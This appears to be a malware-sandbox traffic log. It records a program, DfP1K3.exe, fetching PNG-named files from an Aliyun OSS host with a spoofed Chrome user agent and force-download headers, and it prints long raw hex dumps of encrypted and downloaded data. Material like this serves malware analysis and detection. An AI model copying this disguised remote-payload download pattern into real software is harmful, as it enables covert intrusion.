                                                                                                              2025-01-11 03:43:54 UTC4096INData Raw: 90 6b e4 2c bd d7 53 84 08 52 cd 3f 7d 50 02 52 cb 5c 84 93 fa 52 b9 03 71 75 a2 df 12 0d 22 11 8c d0 85 1c 37 5a fb 7b 32 b8 ea ac 12 0d b9 ee 5f 50 b0 26 c2 06 4e b3 11 89 90 ae a0 a2 a2 c3 2b fa f5 ae 0c 24 a1 43 e5 ac 44 f4 db cd 81 fa 54 84 df c0 85 15 54 3b 5b bf bb 52 90 b7 01 1b 9e 12 a4 44 4c b3 12 86 c6 c7 f7 59 14 79 c6 c3 19 4a 4b 2a c2 1e 60 33 a2 62 e7 11 20 ef 67 94 6a 50 21 93 7c db 89 7d 41 df 08 6f 56 77 e3 65 ea a1 ae ee 30 46 93 36 b7 09 ad c3 22 9e 7d a9 76 1a b4 b1 47 87 d3 0a 1c e5 45 5d f6 1c 29 de fa 4b 22 43 b2 5b b3 fd 30 45 0b a9 7c 28 af aa 88 e7 c4 0f e9 13 ad 03 06 05 2a ba af dc 71 9e 8b 3e ab 50 d2 c2 01 a9 d3 78 45 e1 6d 3d 9a f5 dd fb e3 1e fa c8 ee 54 bc fb 5f 5e 2c eb 03 6a 61 ca 7c 40 78 76 97 f5 15 4a 6b 0f f2 f7 c1
                                                                                                              Data Ascii: k,SR?}PR\Rqu"7Z{2_P&N+$CDTT;[RDLYyJK*`3b gjP!|}AoVwe0F6"}vGE])K"C[0E|(*q>PxEm=T_^,ja|@xvJk
                                                                                                              2025-01-11 03:43:54 UTC4096INData Raw: 82 d5 1e 5f ed 61 54 e7 73 08 f9 2f 0c b3 0c b5 0b 7e c5 94 13 a2 6c 60 0e ef de 4b 8c ce 53 41 5d 66 66 5d 73 0f ec 3d ed ec d6 e8 3a fc c3 10 53 4c e2 83 81 b2 ed a7 c3 66 a0 59 24 aa 4d 11 46 1b a1 64 a0 19 2a 7d 40 df 58 9c 77 65 17 f9 3c 7d 1f 71 24 a1 d7 09 c5 0b 4e 06 82 24 4e 61 59 12 b4 23 3d 4d b8 97 1e 57 d6 ab 8a 37 4e 85 d4 3f 01 bd 6b c6 d7 e2 fd 31 7c 6d 65 3e 45 b4 96 5e 1a b7 24 f2 98 22 ce a0 6c b5 ec 90 07 f5 f1 f4 08 1a 9c 85 75 f7 bd 56 75 7e a0 38 d8 c6 48 6c 70 15 4b d2 f2 56 94 04 74 a4 89 a0 f9 1d 2e 32 e0 fd c0 ad 8e 14 df f4 78 f7 b2 d8 7d dc 9e ec b0 06 2e 61 cd 86 b7 c7 09 3c 2a 95 3b 2f 13 35 67 36 a0 2e c1 0a 39 b6 a1 dd 56 c9 bb 8c 41 a5 c9 88 ad a9 d2 e5 e0 2a 52 7b 45 b0 59 43 4a 98 a7 e1 c4 0d 18 2f 0e 57 ba 34 dc 1d f6
                                                                                                              Data Ascii: _aTs/~l`KSA]ff]s=:SLfY$MFd*}@Xwe<}q$N$NaY#=MW7N?k1|me>E^$"luVu~8HlpKVt.2x}.a<*;/5g6.9VA*R{EYCJ/W4
                                                                                                              2025-01-11 03:43:54 UTC4096INData Raw: 1b 21 35 61 1a 11 18 6e 7b 42 20 36 0b 12 58 8d 23 ff 35 3e fa 04 7f 02 4d 67 99 7c b3 ea 88 f5 fc f1 32 c1 f2 c5 66 16 c6 e3 d2 86 d2 aa 3e f6 eb 9d 27 0d 12 be a1 9b ca 73 a8 54 4b ea cf 9d 5e 08 47 c3 6e 8a 4b 41 db b2 4d 19 c2 78 6a b0 c1 e1 30 57 40 11 d0 1f 6b ef c2 75 65 d0 c9 83 7d 3c c9 bb e6 85 fe d5 09 45 5b bd 5a fd 86 40 5b a6 d9 89 19 99 b8 6d eb d0 4e 4a 43 64 3d 0e 1d 9c de 9a 59 4a fe 08 c2 47 1f ad 17 31 a0 4e ec 12 b3 17 94 35 ed 86 87 0d c7 b8 9d a0 0f aa 3e 5d f7 ff 09 0e 60 30 0a 12 e4 3b 53 41 9c 09 07 ba 8b 74 56 3f 66 d0 ee 20 a7 03 ce 4c 5d e5 ff 34 a5 69 e8 17 e3 7d 1f 51 3d 0d 18 b6 99 6b c1 4e 72 9e e5 db ed 7c a6 73 4a 5d 5a 54 77 d4 06 76 d5 b1 69 54 26 e1 e4 0d b8 3f 27 86 5d 9c fa 50 d0 9f 38 8d 82 2b b4 8a b5 fd c7 54 fe
                                                                                                              Data Ascii: !5an{B 6X#5>Mg|2f>'sTK^GnKAMxj0W@kue}<E[Z@[mNJCd=YJG1N5>]`0;SAtV?f L]4i}Q=kNr|sJ]ZTwviT&?']P8+T
                                                                                                              2025-01-11 03:43:54 UTC4096INData Raw: 66 0d be 2a cd 0a 6b c5 13 7e 2c 10 4a 5e 67 dd 43 bd e2 87 d0 82 c3 40 7e 1b bd 21 4a 2e 2e 9a 83 5a 43 e9 94 18 6b b9 c7 2a 66 6e f4 09 89 34 0e db cb fd f5 7b bd 63 39 c1 b7 7f de d1 72 b3 b5 1f 7b d6 e3 a5 95 65 b3 c8 de 7d 85 60 c8 88 d0 2b da ba 73 f2 47 be 6f ee 94 ee ae 58 26 81 f0 e4 4f dd 3e 1e 76 b2 76 9a 6e b1 7d e2 92 a9 bc 6a 96 44 e3 04 e3 94 54 64 28 7d 87 58 54 b3 a1 68 5a 1d 66 8c 3a 89 ff 5f 78 9b 58 e4 b5 68 27 63 3d 16 2f 7a 2f e5 d0 33 76 60 5a 44 19 8a 55 e3 f0 43 12 6f 0a 56 80 5a 15 96 13 8f 9c 41 ee 8d 09 b3 42 e2 76 86 f6 70 cf 0b 29 67 00 66 2e 92 0d 2c 91 d8 c2 89 37 e5 ac 9f 46 e8 49 0f f5 d8 09 c8 41 5e 26 1a b3 c6 93 49 2b 0b 1d b7 ed 44 38 5a ee d5 5b d4 be 36 25 d5 d5 47 f7 22 62 d6 eb 68 22 06 73 c9 d2 4b e7 82 57 43 0b
                                                                                                              Data Ascii: f*k~,J^gC@~!J..ZCk*fn4{c9r{e}`+sGoX&O>vvn}jDTd(}XThZf:_xXh'c=/z/3v`ZDUCoVZABvp)gf.,7FIA^&I+D8Z[6%G"bh"sKWC


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.849992118.178.60.1034437124C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:43:56 UTC127OUTGET /dsb-hr3.png HTTP/1.1
                                                                                                              User-Agent: Chrome/114.0.0.0
                                                                                                              Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:43:56 UTC545INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:43:56 GMT
                                                                                                              Content-Type: image/png
                                                                                                              Content-Length: 357504
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8FC07D4B934366BFDBC
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "2977911419E268860C5E85E967E5C13E"
                                                                                                              Last-Modified: Sat, 13 Jul 2024 15:18:19 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 9585452185678011734
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: KXeRFBniaIYMXoXpZ+XBPg==
                                                                                                              x-oss-server-time: 7
                                                                                                              2025-01-11 03:43:56 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 21 a8 9c 0d a6 87 5a a6 77 c6 f9 24 18 ad d2 a2 7f c3 44 ba ce 4e 6c 76 be 69 d8 91 e4 6a f0 7f 34 a0 3a 9b 21 8c 09 48 40 89 3e 33 93 fe c7 44 ab 77 84 ce 30 0a 4c 1b f1 96 c9 bb 57 fc 05 46 f8 0f 79 12 8a 88 68 72 3e ee 57 df 71 ba 6a b8 79 58 0c cb 9c 90 eb bb 4e fb 09 13 4e 79 98 6c f7 73 16 1f d2 7e a1 c5 26 33 08 50 ac ac 8d 66 ff 34 3f cf 26 ba 23 50 10 1f c3 3c e3 e2 b9 79 22 d7 15 78 b3 d2 c4 66 02 62 ae 4a 53 dd ea ce e4 14 49 3f 98 17 08 73 f4 7d 54 45 32 9c 41 06 71 ce fd 4f 2a 6b 49 10 c2 50 bd 4d ab 68 c3 fb ea 41 3d 97 d8 a7 56 39 05 d5 05 a3 e9 41 88
                                                                                                              Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7!Zw$DNlvij4:!H@>3Dw0LWFyhr>WqjyXNNyls~&3Pf4?&#P<y"xfbJSI?s}TE2AqO*kIPMhA=V9A
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: 8c 62 15 f5 0e 67 83 25 70 72 63 6c ce f2 f7 5a 9f 27 80 5c 92 c4 16 a6 f4 12 6f 67 16 f1 c5 5b 9d ea 1b ed db 9e 58 10 8b 30 a5 0f c2 07 fe 09 01 09 ba af fa 7f 0b b6 d8 c2 4d 9d 48 b2 95 4d 18 28 4d 33 93 85 bc 89 9b 9b 19 b7 3b ae 2f 1d 04 60 03 9d 19 fa 37 21 f4 0d ea 17 d3 f1 47 6a 53 0a 2f 09 33 e3 e0 f4 9a 2e 8f ed 53 08 4e 13 50 06 7e 5c 77 07 8e da d6 56 26 7c a0 d3 d9 c5 ac 3b ed ab f2 24 44 bd 53 f4 87 d3 c5 53 77 08 3d 8e bd dc 4e 37 51 b4 94 2d 03 ef 98 a7 54 f7 1b a8 c5 f8 f1 e1 c3 e6 1d 13 c1 8d b4 93 ac 3f d5 18 da 1b 14 36 96 d3 41 8a 29 28 55 19 27 b6 04 cf 25 1e c2 28 2e e0 ac d1 c4 79 b5 c3 09 35 f8 49 b8 7a 39 d9 83 68 5c 23 7f 2d 9e bc a5 75 9c ce 20 b8 ba 03 26 ae 37 3c 95 e2 73 fe 99 b6 38 c3 58 bb d1 09 1c 70 7c 1f 47 b8 cc ec b7
                                                                                                              Data Ascii: bg%prclZ'\og[X0MHM(M3;/`7!GjS/3.SNP~\wV&|;$DSSw=N7Q-T?6A)(U'%(.y5Iz9h\#-u &7<s8Xp|G
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: f8 0d 1a ed d7 20 cc b6 ea a7 ef bf 12 e0 fb 20 6a 4d 3d 7b d8 bf 8a 25 40 9b 9e 91 c2 15 44 17 2a 9f 19 07 b9 f4 3a ca ac 73 ca a6 b0 5d f6 24 5b eb 02 43 93 df d9 be b4 a4 1a 5e 2d 00 e5 c2 54 9a 4d 73 87 79 a7 ed 01 4b 8d ff 65 b7 dd 49 e0 8d ef 9a 81 cc a3 5a b6 75 0e b0 f1 c5 16 3f 56 b9 06 7f c5 00 f6 3e 7f da 08 db f2 46 91 8e 70 49 f6 20 05 5c 0b e0 4d 9e 50 24 29 a4 13 44 28 77 51 13 78 dc 5a 73 ff 6c 51 65 46 b0 f6 ed b0 f3 be a1 c9 9b 83 95 5c 97 d2 da 5d a1 00 79 53 77 9b cc 90 b9 90 25 38 c8 3e 8b f9 a8 40 bc 38 9a 67 69 51 ef 40 00 49 f7 39 aa 1f 54 ff 23 f3 b8 10 10 d1 90 1c 69 92 f1 04 f7 3c 76 a6 32 03 d8 39 36 b8 5f 6b 36 4b f9 1e 29 7e 8f 8e 1f 29 08 5d 03 a0 43 50 37 ca 71 cd 09 21 ce 8e 09 e9 13 85 51 57 dc e0 cb 9f dd a2 08 d6 85 3a
                                                                                                              Data Ascii: jM={%@D*:s]$[C^-TMsyKeIZu?V>FpI \MP$)D(wQxZslQeF\]ySw%8>@8giQ@I9T#i<v296_k6K)~)]CP7q!QW:
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: cf 4f 41 8f a8 a5 3d c1 e5 8c b1 22 26 ca 3c 3c a7 cf 01 91 58 fd 57 ff ed d8 b7 45 67 01 13 b6 86 13 86 01 90 75 51 1e 4c 70 ce fd 2f 1a 63 c3 52 c6 9d 4c d1 ef 2d db 26 30 b5 36 b6 07 12 1e 14 e7 fd 90 f5 e6 f0 6a 58 46 73 59 05 38 ff a2 d2 fb 11 77 7f 8b f0 e2 08 b0 49 0e 96 00 f4 99 09 cd 5f 10 18 83 59 5d 68 f1 84 c2 09 d7 1a ca fe c5 03 4a b8 24 56 2c ae 54 76 a5 d6 cb c3 c4 d4 2f fe 29 67 08 06 b5 e8 2a f5 76 1d e6 08 91 59 53 03 62 b8 05 c9 04 4c ec 51 ea e7 64 08 85 a0 ad 54 f4 f1 6d 0c fa b7 26 48 49 80 e2 ef c7 bc e2 df e6 42 91 9f 36 66 86 82 a9 09 f3 3b a6 bf ff 58 7a d8 de ad d3 0a 52 1c 8e 55 6d d3 b7 63 bc e6 a8 c9 19 b4 26 09 47 04 58 b2 ca 91 76 29 77 25 8b 48 cd a8 7e 20 a2 24 6e df 76 39 4c 3b d9 2d ae 31 82 99 5b 8f c7 bb f7 c5 c8 5b
                                                                                                              Data Ascii: OA="&<<XWEguQLp/cRL-&06jXFsY8wI_Y]hJ$V,Tv/)g*vYSbLQdTm&HIB6f;XzRUmc&GXv)w%H~ $nv9L;-1[[
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: 20 d7 e6 4b d8 d6 ff a7 39 9e d4 ea 4c 2b 99 c5 2f 7b a7 6d db 13 3a 0b 23 1a fb 9c c1 a3 d8 19 5b b9 2e a0 f1 ac b0 be 60 bc ee a3 07 51 89 b5 f2 9a e6 a9 02 99 2d 41 2a 1b ba b8 bc ac 10 35 86 7b 47 b0 b8 79 1e d7 f6 c0 b8 10 45 85 c8 80 51 8a 9f 16 a1 f3 aa 1f 36 63 f1 d7 d7 3b 63 d9 a7 8f 57 cf 3f 6a a7 26 22 bd ee 1f 7d a0 ae be bc 84 2b 91 26 59 bb f3 9c 64 2c df 8b 18 42 33 06 f4 1c 71 53 34 9d 75 d8 12 9f 3a 0a 78 36 24 2b 85 2d ff bf 91 6b a6 dd 0a 3c b8 61 b0 43 ef 39 d3 6c ac 8a 2a dc 61 8b 83 3f 67 ea 7b d2 65 18 1d 2f bc 27 d6 7b 0c eb be a3 a1 3f 87 78 7e 5c 6b 86 c9 90 aa 73 7b da f1 6e 5d 5e 32 48 bf d5 ac 64 c9 9f 75 d9 0d b2 b0 21 69 7b ae 16 80 9f c4 36 37 36 3b f3 95 14 ba e1 e3 e2 cc bf b8 6a 80 93 13 ca ac 30 f1 2e 87 60 f1 e5 37 37
                                                                                                              Data Ascii: K9L+/{m:#[.`Q-A*5{GyEQ6c;cW?j&"}+&Yd,B3qS4u:x6$+-k<aC9l*a?g{e/'{?x~\ks{n]^2Hdu!i{676;j0.`77
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: eb 57 4f 63 5c cc 42 b4 4e bf a4 71 d9 c4 a8 49 0d 65 77 c9 28 ce dd 85 44 1d 86 43 86 9e 4c 31 21 d2 41 d6 fc f3 bc de 57 be bc 58 e3 8b fb 22 7b 1a 86 e3 b5 90 bd 7c ed 96 57 e0 ef 7c 8a 8d ba c2 78 12 a7 94 e4 bb 49 0f b8 5b 33 f1 9d 3e 3e 83 13 44 16 e4 19 28 30 da 19 f4 58 77 59 d1 c1 4f ac 78 89 0c ca e9 a6 41 52 57 95 42 28 4a 8f 9c b0 51 65 15 a1 0b 92 e0 b9 9b c0 98 83 0c df 14 3d 3c 13 cb f3 40 83 0a 1a 8c cc 39 8a 9e 7b 65 89 31 42 8b 8d ce 8d da c5 33 dc 6c c6 8d 33 83 bd 72 3f 33 af fd 57 98 2e 30 19 14 39 28 7f 84 26 6c bf ae 57 b7 0c 5b c0 26 4b ea c3 f3 48 0f c1 aa ad 31 a9 35 a4 56 90 3f 12 a1 4f fb 4d 96 19 ac 80 6a 02 10 f9 4f ce 02 88 a7 d2 90 84 bc 5d a2 a2 87 83 c7 f6 44 93 95 40 5d f0 9e 39 68 f6 e6 27 9a 0b a9 af c3 6b 96 a1 5e f3
                                                                                                              Data Ascii: WOc\BNqIew(DCL1!AWX"{|W|xI[3>>D(0XwYOxARWB(JQe=<@9{e1B3l3r?3W.09(&lW[&KH15V?OMjO]D@]9h'k^
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: 1f 44 91 aa 8b bc 05 55 03 25 ad 18 97 34 b5 aa 8c f0 cc 5f 25 fe 7e 0c fd 4f 29 cb e1 a4 e0 20 0e bd 45 81 36 48 0a 71 60 3a f7 aa 87 1e b3 10 6a 07 b4 1d b1 96 74 37 22 11 0b 26 30 21 26 28 17 b6 eb fc 4c b5 b9 fb cb 96 eb f6 04 cd b8 89 74 bf 62 27 3c fa bc 45 d9 51 dd 8d eb a9 ec e5 6b d6 37 ac 4f c4 c1 47 dc e7 c6 ae 66 85 fd 6e 33 47 7e 0f a6 7e 01 e6 49 9e 0d 8e dd 9a 54 76 84 76 79 5e 0c ad 05 3c ce ea 42 ad b9 c5 50 dc 57 7b 35 83 ed 43 da 47 25 39 b8 55 1c 22 16 a3 3b bb 96 82 d0 3d 54 92 ee ce 23 db 18 6d 95 4b 32 2b 1c 6d 59 76 92 27 38 71 fb e0 b2 c3 ad 33 e4 dc e2 20 9f 4e 1d 8e eb 83 55 33 7e 82 7b 93 4e 81 47 e5 fe ec f6 06 42 20 0e 84 2f 83 23 59 3c 93 27 0b 7d 1c 35 cf ac aa eb 3c f4 69 3c e4 66 73 f1 97 fc c6 dd 8b 59 7a 05 bd d5 cf a8
                                                                                                              Data Ascii: DU%4_%~O) E6Hq`:jt7"&0!&(Ltb'<EQk7OGfn3G~~ITvvy^<BPW{5CG%9U";=T#mK2+mYv'8q3 NU3~{NGB /#Y<'}5<i<fsYz
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: 92 b2 7c a6 cd 52 9d c4 97 c0 9e db 30 fb 5d a4 ad e8 a8 48 54 db c4 c1 2d 82 be f2 dc 34 c2 e0 cb c3 58 b2 ac 29 24 07 fa a6 d1 ea 1c 4c b8 cd aa 25 f8 5c 42 98 62 f2 68 ad 31 53 06 04 07 4d 6d 99 2f 1d 4e a4 e7 66 2a 65 fc 2b 8b e7 03 54 9c 74 34 bf 2b 4a ad f7 89 96 c1 21 6e 0c e5 8f 2e 55 92 dc a8 c9 6c 5f f9 cf 47 ac 2a 10 a4 fd 23 20 cd f4 0b d8 c2 64 65 7e d1 aa f0 2e c0 56 18 20 d3 64 35 42 41 0e cd b5 e6 ff 77 24 d1 22 03 fc 08 aa 26 41 31 02 36 c2 c6 9a e9 45 58 bd 2b e1 a7 1b 8e 70 44 7e ca 89 33 94 c7 b8 d3 3a e6 87 e2 2e 1d 32 fe 30 c3 a2 2e 39 fc 89 40 45 9a 99 55 3b 30 99 0f d2 b0 17 60 3a 1f e4 d9 79 05 f8 25 f5 fd c4 9a 07 f5 84 30 c2 ab ba 97 95 5f 75 c0 20 12 da 75 e7 ca c7 43 5e c7 6a 4d c7 60 89 11 d3 04 2b 8b da 31 20 6b d0 32 40 61
                                                                                                              Data Ascii: |R0]HT-4X)$L%\Bbh1SMm/Nf*e+Tt4+J!n.Ul_G*# de~.V d5BAw$"&A16EX+pD~3:.20.9@EU;0`:y%0_u uC^jM`+1 k2@a
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: c1 4d 2c 3d ba 62 d6 96 71 ca d6 4b b5 58 cd 4a a4 11 4c a3 d0 89 6c 6b fc ee fc 4b 4d 35 c9 f7 95 4b 97 32 7e 44 2b 37 11 03 9b 99 91 5a f7 14 37 7b 37 cc 65 b7 a9 cf 8d f4 eb 41 46 51 24 fd 25 af fc 86 9c 1f c4 1a 54 8b 3b fb 7d 39 ec 48 e5 7f 21 a6 b6 db 76 55 bb 27 ea bc ab 6d 7a 28 4e ff 3f 9c a2 57 83 f5 fd 76 19 12 05 9b f5 d8 a8 07 9e 81 f9 12 bb 26 4a 6b ed d6 ac b7 f9 f9 e4 d0 bf 0b 9a 3f 49 46 40 63 f3 00 f8 8d e9 26 e6 fd 66 ea 99 8d bf e6 ed 98 de 15 fc 0a fa 0b ba 75 2e 1f a1 7f 27 dc bd a7 76 d8 98 91 91 79 63 58 d1 8a f8 f9 31 88 66 9b 7d 56 b3 ba 0e b5 ec 4a 54 b6 1e ff 15 5d 67 86 04 28 61 c5 76 22 30 7b 50 f4 8a 66 f7 1c 9a 39 a1 f9 22 90 d9 41 48 93 50 e7 2a 69 dc a7 cf e6 d3 6e 03 c6 19 7a c8 94 1a 5f 0e 7e ab c3 e2 8d 2e f0 f1 71 ae
                                                                                                              Data Ascii: M,=bqKXJLlkKM5K2~D+7Z7{7eAFQ$%T;}9H!vU'mz(N?Wv&Jk?IF@c&fu.'vycX1f}VJT]g(av"0{Pf9"AHP*inz_~.q
                                                                                                              2025-01-11 03:43:56 UTC4096INData Raw: 30 dc a8 86 8a 8d 57 75 88 45 99 d1 d6 cd 5e 4f 69 9a 0c 36 e9 b7 8c 7b 13 db f4 19 d3 01 f2 a0 48 d8 4a 89 2f 3d a8 74 d7 e8 bc 4e 70 18 9d 28 6f 98 b4 c2 9a 58 6d df dd 5a d6 24 eb bc eb 24 be b7 e7 d2 02 13 9f f6 92 b6 01 be 9c fc 5c fc bb e9 61 c9 a8 ce a6 f9 f3 10 cb 92 1b 91 59 ca 67 33 c9 33 97 8e ef 02 17 58 4b 63 e1 25 4d 3e e6 ca 69 0e f6 16 c5 bd d6 00 23 58 d8 ac a5 f3 37 34 59 c0 26 a9 c8 ca 47 33 aa 21 12 8e a1 b1 b4 45 97 58 5e 6f 86 95 92 32 de 10 ca 80 4e f0 3d 38 e8 2d 31 d9 4c 0d b0 ea 9d fa 03 af da e5 ce 06 fc 7f 93 1d e9 86 84 10 f1 fb ce 8e fc 26 c1 f6 91 f9 f1 c1 d7 80 5e 3b af 0c f1 52 ec 21 96 8e 81 7e ac 0d f8 ec cb 67 6c 10 b0 83 83 0a 12 b5 22 d5 b5 b0 18 73 d5 76 a3 88 37 35 b4 11 43 0b 74 ea 9e 40 2e 90 e2 29 c1 e9 02 56 dc
                                                                                                              Data Ascii: 0WuE^Oi6{HJ/=tNp(oXmZ$$\aYg33XKc%M>i#X74Y&G3!EX^o2N=8-1L&^;R!~gl"sv75Ct@.)V


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.849993118.178.60.1034437124C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:43:58 UTC127OUTGET /dsb-hr1.png HTTP/1.1
                                                                                                              User-Agent: Chrome/114.0.0.0
                                                                                                              Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:43:59 UTC546INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:43:59 GMT
                                                                                                              Content-Type: image/png
                                                                                                              Content-Length: 486896
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8FF3D53853136D38BEE
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "8FB4D4B3DCE57A2C6F9FF2278B5BAE86"
                                                                                                              Last-Modified: Fri, 22 Mar 2024 09:16:17 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 13263015917138006152
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: j7TUs9zleixvn/Ini1uuhg==
                                                                                                              x-oss-server-time: 6
                                                                                                              2025-01-11 03:43:59 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 e5 a2 42 4a a8 8d 40 ac 73 c6 f9 29 ae 1a 96 f0 c7 c3 4b 00 ce 4e 63 cc f6 6a d8 91 e4 21 90 5c d8 a0 3a 98 21 dc 45 1c 05 ce 4e 7f 01 81 b6 26 e5 3e 00 b5 4d 6e 2a 70 93 f3 af ee 38 75 a1 c9 a0 9e 58 52 06 4c 39 83 94 75 65 f9 b9 74 78 66 41 24 b6 8c fe 7b 34 ca d8 46 76 c3 6a 19 be ba ba d0 ab a1 02 9c 6e cb 3b a5 1f 22 5f be 2c 1f 46 79 be 1d 31 c0 b4 f9 aa b2 c6 86 a2 a8 cf cb c7 70 77 57 fe fc f3 87 68 e8 e2 0b 6f cd 35 43 90 53 59 13 af fa 20 de 75 cf 38 f0 0a 60 ae 4e e6 3d 38 df 24 af 1e a0 e9 cb 6d 8f 0e 2b 74 0c e7 47 02 44 b6 86 1d e1 88 e3 39 f4 b1 3f 14
                                                                                                              Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7BJ@s)KNcj!\:!EN&>Mn*p8uXRL9uetxfA${4Fvjn;"_,Fy1pwWho5CSY u8`N=8$m+tGD9?
                                                                                                              2025-01-11 03:43:59 UTC4096INData Raw: 12 b9 9e 1d 9a 7a 6b b1 80 2c d3 33 f3 ba d8 49 35 5f c0 e8 c1 62 ac 3f 5d 35 fd 81 a2 46 4a 0d 87 5a bb 96 93 58 b3 58 26 41 7a 31 5b cb b1 5d e2 77 41 fd a6 4d 43 ed 45 d8 5f 4d cd 42 68 56 f8 b9 06 ae ab e2 75 08 f0 40 35 77 d6 99 c2 30 b9 1e 71 e6 53 ee 08 06 50 41 34 32 04 72 01 92 fe c2 d7 d7 30 f9 aa 57 1d aa ca a8 5b 4b fb c9 1d 1f b6 e6 bf 24 74 6e b2 e3 12 73 ce 30 10 39 56 e8 ad 4c ee ad 21 38 ad 0a ff e2 98 23 e4 28 f7 11 5a b5 40 6e a0 0b 9a 1f a3 e6 44 ac 1e 57 02 b7 d7 40 1a 9b ec 2c 2b c7 65 e5 a6 b9 3e 4c b6 b6 cc 9d 74 d7 21 7e e5 30 aa b6 00 2f e5 49 66 71 f8 9f 70 c1 a0 f5 02 e2 56 d3 7c c3 29 7f 37 0c f8 84 e5 ae e4 d9 30 ca dd 0c 8e f2 de 9b 62 db c3 a1 20 e7 55 a9 fb ff a0 f8 5b de fe b4 8e d2 5c 24 e1 d0 cb 29 58 a5 cc f7 3a 36 4d
                                                                                                              Data Ascii: zk,3I5_b?]5FJZXX&Az1[]wAMCE_MBhVu@5w0qSPA42r0W[K$tns09VL!8#(Z@nDW@,+e>Lt!~0/IfqpV|)70b U[\$)X:6M
                                                                                                              2025-01-11 03:43:59 UTC4096INData Raw: 67 41 fb 24 00 63 de bb bf 78 39 cb 89 d8 d1 c1 43 39 06 08 31 a5 c9 37 d5 60 29 c0 21 60 52 33 02 eb 3b 83 7c 9b db 93 c7 aa 75 44 f4 5d cb 29 c1 a2 ec ed a5 37 96 0c e7 d8 09 20 11 39 fa 3e 51 69 d9 d3 87 68 11 2e 42 a4 ee 48 18 b2 cc bd 88 e3 09 8a 0e 42 11 44 75 3b 07 48 f7 44 f4 65 d7 0c 99 ab 18 22 a6 af 3e d7 2e 78 c7 d4 fd 85 d4 b6 36 60 48 24 17 04 7d 04 30 ad d9 a2 22 d6 95 cd 12 79 1b 99 68 3d 05 9b 61 53 bd 57 16 9c 1b b4 2f a1 d2 2a 30 b8 66 e2 43 54 2e 50 45 54 2d b7 df 1c 72 6d 57 79 64 5a 8f 7c 2a 53 71 fa 52 54 f2 c0 5a c2 a9 03 c1 87 72 a8 19 59 74 20 19 ac 16 aa e9 0f 3a 4a 3b 06 d9 0d eb cb 6f 88 f9 76 06 58 61 96 6f 04 0c 5d e3 b1 68 78 0d a8 2e 24 5a 1e 5d b1 41 8f f1 d4 8c b5 ed ba a9 b7 e4 3a 80 80 75 04 7b 2f 4a fe c6 b4 90 f4 82
                                                                                                              Data Ascii: gA$cx9C917`)!`R3;|uD])7 9>Qih.BHBDu;HDe">.x6`H$}0"yh=aSW/*0fCT.PET-rmWydZ|*SqRTZrYt :J;ovXao]hx.$Z]A:u{/J
                                                                                                              2025-01-11 03:43:59 UTC4096INData Raw: 0c 86 5e b7 a1 b6 ba 21 5f 01 98 e3 94 c6 39 26 87 95 b1 4a 82 31 c8 73 3e 23 d2 7c ff 19 9b 4e c9 aa ce c2 ad 50 48 7a 9f c2 20 d3 97 11 65 74 6f 4f fe 82 4e 60 e4 bb 87 bf 85 b5 5d 76 1a c8 08 64 75 59 71 2f 7d ce ae 7c 8c 63 2f dc f5 c7 25 9b b9 3a 62 4f 56 eb 6b 74 e9 c8 e3 16 75 63 34 fc 42 43 be e4 b7 28 07 6a 98 d1 f9 a2 84 fa 41 8f 82 20 18 60 da 35 92 4c 09 89 bf aa e3 d2 c3 b3 a3 95 ae 6f 10 ec bb d8 b9 49 21 cb bb dc 8a e3 25 4b 61 df d2 96 74 32 fa 6d 22 b2 b3 72 9f 07 34 f3 b9 ad dd ea e6 5b c8 a1 85 8e 81 d1 6c 06 ac d5 ce 45 b6 c9 34 6b 85 f4 79 ef 3a b9 c7 f6 38 14 a0 ee f6 06 72 2c 1a 3f d4 58 9e 7c 3d 75 17 e0 1f 57 36 32 d4 41 63 02 a4 cb 2d 01 a8 21 0d 73 0e bf 38 55 62 66 6b 65 55 c4 4a bc 85 ce f8 30 6e 